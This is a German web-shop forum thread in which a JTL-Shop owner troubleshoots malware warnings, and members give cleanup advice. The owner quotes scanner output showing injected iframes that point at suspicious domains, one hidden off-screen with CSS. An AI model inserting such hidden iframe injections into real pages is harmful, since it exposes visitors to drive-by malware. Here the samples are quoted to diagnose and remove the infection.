Malware im Shop?

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
Hallo,
habe ein Problem mit Malware die anscheinend nicht immer aktive ist.
Habe gestern unseren neuen JTL Shop installiert nachdem wir bereits mit unserem vorigen XTC Shop probleme hatten.
Habe dafür extra eine Linux Live CD genommen um Viren befall meines Rechners aus zu schliessen.

Leider hat dieses anscheinent nicht funktioniert.

Habe heute morgen gleich Post von Google bekommen das wir wieder einen Malware befall haben.

Hier noch mal die auflistung wiee ich installiert habe:

- SQL und FTP Datein gelöscht
- mit windows live cd daten hochgeladen und installiert
- Vorhandene Daten vom JTL-WaWi installiert (Windows Server, anscheinend frei von Schädlingen)

Dann heute morgen wieder die Wahnungen.
Bin dann nach ein bischen googeln auf die Seite Sucuri SiteCheck - Free Website Malware Scanner gekommen
die mir erst gemeldet hat das ich mir folgendes eingefangen habe: Sucuri Malware Signatures

Aber ohne das ich etwas gemacht habe ist nach ca. 1h und erneuten scannen die Malware warnung weg, die seite ist "nur noch" Blacklistet.


Was kann ich noch machen?
Kann es sein das der Hoster sich etwas eingefangen hat?
 

Modulexpert

Sehr aktives Mitglied
14. März 2007
1.678
1
AW: Malware im Shop?

hört sich eher nach nem serverbefall an.. ist das dein server? dann neu aufsetzen. retten brauchste eigendlich nur die DB.
 

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
AW: Malware im Shop?

Google meldet das z.B. das eine Code-Injection
<iframe src="http://searchblowout.info/?a=YWZmaWQ9MDUyODg="
width="152" height="123">

Von Sucuri bekomme ich folgendes

<script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery-1.4.2.js"></script><style>.i0opltf { position:absolute; left:-1400px; top:-1758px} </style> <div class="i0opltf"><iframe src="http://gunsoverfirbasis.com/?a=YWZmaWQ9MDUyODg=" width="227" height="293"></iframe></div><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery-ui-1.8.9.custom.min.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.timers-1.2.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.cookie.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.pstrength.1.1.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.simplemodal-1.3.5.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.autocomplete.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.jcarousel.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.semantictabs.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.cal.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/cloud-zoom.1.0.2.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.mousewheel-3.0.4.pack.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.fancybox-1.3.3.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.tooltip.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.tipTip.minified.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/global.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jtl.basket.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.dependClass.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.slider.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/hoverIntent.js"></script><script type="text/javascript" src="templates/JTL-Shop3-Tiny/js/jquery.dropdown.js"></script><!--[if lt IE 7]>
 

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
AW: Malware im Shop?

Detection ratio:1 / 30
Analysis date: 2012-08-31 12:36:25 UTC ( 0 Minuten ago )
File scan:The URL response content could not be retrieved or it is some text format (HTML, XML, CSV, TXT, etc.), hence, it was not enqueued for antivirus scanning.

Bis auf Google Safebrowsing ist alles clean


Das komische ist halt auch wenn ich im Google Webmaster Tool schaue steht da:

Warnung

Google hat schädlichen Code auf dieser Website gefunden. Sie sollten Ihre Website schnellstmöglich bereinigen. Anderenfalls erhalten Google-Nutzer unter Umständen eine Warnung, wenn sie versuchen, Seiten auf dieser Website aufzurufen.

Direkt daruter aber auch

Status der letzten Badware-Überprüfung dieser Website: Die Überprüfung der Website ist abgeschlossen. Die Website ist sauber. Die Badware-Warnungen der Websuche wurden entfernt. Beachten Sie, dass es etwas dauern kann, bis diese Änderung wirksam wird.

Das allerdings auch schon seit 8Uhr heute morgen
 

Modulexpert

Sehr aktives Mitglied
14. März 2007
1.678
1
AW: Malware im Shop?

da darf keine 1 stehen, sondern ne 0. durchforste mal deinen ganzen source nach dem iframe. irgendwo steht der drin
 

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
AW: Malware im Shop?

Wenn ich den ganzen inhalt vom Webspace mit dem Installations datein vergleiche sehe ich keinen Großen unterschied.
Eigendlich nur das was ich geändert habe, den cache speicher sowie die Bilder.

Auch der Shopdateicheck zeigt keine modifizierten Datein an.
 

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
AW: Malware im Shop?

Wie aktuell sind die Daten bei Google Safebrowsing eigendlich?
Bei den Webmaster Tools steht als datum der 30.08.2012 dran, ist das dann eine abfrage von gestern? oder auf welcher grundlage werde ich gesperrt
 

Modulexpert

Sehr aktives Mitglied
14. März 2007
1.678
1
AW: Malware im Shop?

wenn heute abend das noch aktuell ist (also nomma checken) dann mußte wohl suchen wo der iframe ist
Da skönnen eigendlich nur tpl Dateien sein, da du ja sagst das die phps noch original sind
 

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
AW: Malware im Shop?

Heute bekomme ich von https://www.virustotal.com/#url
Noch dieses zusätzlich angezeigt:
Sophos URL description

URL subjected to threat Mal/HTMLGen-A.
Websense ThreatSeeker URL category

Uncategorized.
Sophos domain information

The URL host was subjected to threat Mal/HTMLGen-A.


Gibt es eine Anleitung wie man am besten nach iframes sucht?
Kann das ganze auch ausserhalb des eigendlichen /html ordners liegen?



Gibt es zur reinigung des Webspace eigendlich Dienstleister und wenn ja welche sind dort zu empfehlen?
Ist der Service von Sucuri z.B. für 89$ ein Jahr Malware frei ein gutes angebot
 

frijk

Gut bekanntes Mitglied
16. Juni 2009
218
7
AW: Malware im Shop?

Hallo,

es gibt einen haufen Dienstleister die sowas anbieten - leider sind auch viele dabei die es nicht wirklich können.

Wenn du dich selber auf die Suche begibst:
- Webseite in den Wartungsmodes (damit sich auch kein Besucher etwas einfangen kann)
- Stelle sicher dass dein Rechner mit dem du arbeitest wirklich sauber ist - oft hat man Schadsoftware auf dem Rechner die FTP-Zugangsdaten ausspäht und dann damit Änderungen am Server vollzieht
- Wenn der Rechner sauber ist alle Passwörter ändern (FTP, MySQL...)
- mach dich auf die Suche nach den betroffenen Dateien - ggf log-Dateien checken, Dateien auf Änderungen (vielleicht kannst du mit dem Änderungsdatum was anfangen)
Dabei bitte berücksichtigen dass der betreffende iframe oft nicht im Klartext sondern verschlüsselt in den Dateien abgespeichert ist!
Auch oft betroffen: .htaccess, diese nicht aussen vorlassen.

Alternativ: Shop vom Server löschen und dann das definitiv saubere Backup (sofern vorhanden) einspielen.

Viele Grüße,
Michael
 

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
AW: Malware im Shop?

Aber wiso feindet z.B. Google Webmaster Tool etwas?
Wenn ich mir den Quelltext vom Browser ansehe müßte ich doch den Link auf finden?
 

frijk

Gut bekanntes Mitglied
16. Juni 2009
218
7
AW: Malware im Shop?

Wenn es im Quelltext steht ja. Falls aber z.B. die htaccess befallen ist wirst du im Quelltext nichts sehen und trotzdem beschwerden von Google bekommen.
 

Vollautomat

Gut bekanntes Mitglied
21. Juli 2010
292
3
AW: Malware im Shop?

Habe es gefunden, es war nicht unser webspace der verseucht war, sondern der Server des Hosters. Beim einloggen in Confixx Center bekamm ich plötzlich die gleiche Virenmeldung die mich stutzig gemacht hat. Nach umzug (Inhalt nur kopiert) waren wir wieder Malware frei
 

Modulexpert

Sehr aktives Mitglied
14. März 2007
1.678
1
AW: Malware im Shop?

Habe es gefunden, es war nicht unser webspace der verseucht war, sondern der Server des Hosters. Beim einloggen in Confixx Center bekamm ich plötzlich die gleiche Virenmeldung die mich stutzig gemacht hat. Nach umzug (Inhalt nur kopiert) waren wir wieder Malware frei
Dann such dir schnellstens einen anderen Hoster.Sowas darf einem Hoster nicht passieren.
 
Ähnliche Themen
Titel Forum Antworten Datum
Neu Shop Exploit / Hack / JS Injektion Bestellabschluss Vorkasse Iframe Zahlungsumleitung Allgemeine Fragen zu JTL-Shop 19
Neu Suche 10–15 JTL-Shops für kostenlose JTL-Shop-Analyse (verschiedene Branchen) Dienstleistung, Jobs und Ähnliches 0
Neu JTL-Shop 5.7.2 Picture-Tag in mobilen Ansicht lädt beide Bilder JTL-Shop - Fehler und Bugs 0
Seit dem Update meines JTL-Shops auf Version 5.7.1 funktioniert die Verbindung zwischen JTL-Wawi 2.0.4.0 und dem Shop nicht mehr. JTL-Wawi 2.0 5
Neu Shop 5.7.2 - JTL PayPal Checkout legt alles lahm JTL-Shop - Fehler und Bugs 4
Neu IP Adresse einer Kontaktanfrage über den Shop herausfinden Allgemeine Fragen zu JTL-Shop 4
Neu Gibt es in der WaWi-Datenbank einen Zeitstempel, der anzeigt wann ein Kunde sich in einem bestimmten Shop registriert hat? User helfen Usern - Fragen zu JTL-Wawi 3
Beantwortet [Shop 5.7.2 / Wawi 2.0.5] GPSR-Daten werden am Artikel nicht angezeigt trotz korrekter Übertragung und installiertem Plugin Allgemeine Fragen zu JTL-Shop 1
Neu shop steht , brauche Hilfe Allgemeine Fragen zu JTL-Shop 6
Neu DSVGO konform 1000 Kunden in WaWi und Shop löschen! User helfen Usern - Fragen zu JTL-Wawi 4
Neu 500er Fehler im Shop nach aktivierung des Nova Child Templates für JTL-Shop 3
Neu JTL Shop Plugin - BD Automatisierter Widerruf (Von Händler für Händler - Schluss mit Mail-Chaos & Spam-Sorgen!) Plugins für JTL-Shop 0
Neu Rechte-Fehler im J10n Modul und Auswirkung auf base.mo.php in div. Plugins (Shop 5.7.1) JTL-Shop - Fehler und Bugs 0
Neu Welche JTL Shop Plugins oder kleinen Hilfstools würden euch im Alltag wirklich helfen? Plugins für JTL-Shop 0
Beantwortet Shop Abgleich nach Update auf 5.7.2 nicht mehr möglich JTL-Shop - Fehler und Bugs 4
Neu Shop zeigt keine Artikel mehr Fehler 500 Betrieb / Pflege von JTL-Shop 9
Neu Shop 5.7.1 und Downloadmodul Allgemeine Fragen zu JTL-Shop 1
Neu Plugin: JTL Exportformat Google Shopping gibt <g:google_product_category> unter Shop 5.7.1 und Wawi 2.0.4 nicht aus Plugins für JTL-Shop 1
Neu Widerrufsbutton für JTL-Shop 4 Allgemeine Fragen zu JTL-Shop 17
Neu Rabatte aus dem JTL-Shop werden in der Wawi nur als Netto-Preis übernommen, Rabatt % gehen verloren Onlineshop-Anbindung 0
Neu Laut Backend Shop Update für Shop 5.71 - Download nicht zu finden? Betrieb / Pflege von JTL-Shop 3
Neu Kategorie erscheint nicht im Shop Allgemeine Fragen zu JTL-Shop 5
Neu JTL-Shop - Wechsel von Test zum Livebetrieb - was beachten ? Installation / Updates von JTL-Shop 2
Neu Meta Shop seit September 2025: JTL-Lösung für neue Checkout-URL gesucht Allgemeine Fragen zu JTL-Shop 0
Rabatt Coupons in Verbindung mit Staffelpreisen - JTL 1.11.9, JTL Shop JTL-Wawi 1.11 0
Neu Shop-Update auf 5.7.1: Sprachvariablen im Widerrufsformular werden nicht erkannt, obwohl vorhanden?! JTL-Shop - Fehler und Bugs 3
Fehler beim Abgleich mit dem JTL-Shop JTL-Wawi 2.0 12
Neu OnFinds: KI-Suche für JTL-Shop mit fairer Abrechnung nach Artikelanzahl. 30 Tage kostenlos testen Plugins für JTL-Shop 0
Neu Freelancer für JTL-Wawi, Shop & Prozessautomatisierung Dienstleistung, Jobs und Ähnliches 2
Neu JTL Shop 5.7.1 mit Fehlern - versandarten zahlungsarten nicht änderbar, leere weiße Seite JTL-Shop - Fehler und Bugs 5
Neu Massiver jtl-shop-cron aufruf JTL-Shop - Fehler und Bugs 7
Neu Suche Workflow: Erstbestellung Shop auf Rechnung -> Auftrag Zurückhalten JTL-Wawi - Ideen, Lob und Kritik 1
Neu Neues Plugin: Erweiterter Widerrufsbutton für JTL-Shop Plugins für JTL-Shop 9
Neu [Suche 5 Beta-Tester] KI generiert JTL Shop 5 Templates per Beschreibung – kostenlos testen Templates für JTL-Shop 7
Neu Shop gesperrt - Webspace überschritten - Zusatzspace buchen bringt Fehler - Support fühlt sich nicht zuständig Betrieb / Pflege von JTL-Shop 7
Neu Telemetrie-Datenerfassung in JTL-Shop 5.7.0: Bitte um Klarstellung der DSGVO-relevanten Aspekte Allgemeine Fragen zu JTL-Shop 5
Neu GPSR Hersteller werden im Shop nicht angezeigt User helfen Usern - Fragen zu JTL-Wawi 2
Neu Nach Update auf 1.11.9 - alle Shopify Shop nicht mehr connected Shopify-Connector 4
Neu Shop 5.7 update empfhalen Installation / Updates von JTL-Shop 16
Plattformabgleich Shop löschen - Wo ist das in der MySQL DB? JTL-Wawi 2.0 4
Neu Funktioniert Shop 5.7 mit MariaDB 10.5.29? Installation / Updates von JTL-Shop 1
JTL Shop 4 Upgrade auf 5.5.0 --> Fehler 500 Upgrade JTL-Shop4 auf JTL-Shop5 2
JTL Shop 4 Upgrade auf 5.5.0 --> Fehler 404 Upgrade JTL-Shop4 auf JTL-Shop5 11
Neu JTL Shop 5 und Klarna Plugins für JTL-Shop 0
Neu JTL Shop 5.7 - Widerrufsbutton im B2B Templates für JTL-Shop 18
Neu Dropdown jtl shop länge einstellen Allgemeine Fragen zu JTL-Shop 2
JTL-Shop 5.7.0 Widerrufsbutton Einrichtung JTL-Shop5 43
Update auf Shop 5.5.0 von 5.4.1 ist der Shop nicht mehr erreichbar Upgrade JTL-Shop4 auf JTL-Shop5 4
Neu Merkmale Shop an oder Aus Allgemeine Fragen zu JTL-Shop 1
Neu JTL Shop Template Snackys Bildgrößen einstellen Templates für JTL-Shop 1

Ähnliche Themen